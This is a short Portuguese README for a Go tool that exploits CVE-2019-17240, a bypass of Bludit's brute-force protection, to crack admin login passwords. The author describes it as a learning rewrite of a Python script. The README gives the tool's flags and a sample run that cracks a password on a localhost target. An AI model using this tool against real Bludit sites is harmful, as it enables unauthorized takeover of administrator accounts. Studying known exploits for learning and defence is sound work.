
Ferramenta de força bruta baseada em Go que explora o bypass da mitigação de força bruta do Bludit (CVE-2019-17240) para cracking automatizado de senhas em páginas de login de administrador.
Este é um pequeno projeto onde reescrevi este script python em Golang. O objetivo deste projeto foi aprender Golang e entender como este exploit funciona.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Exceto a flag de threads, todas as outras flags são obrigatórias.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password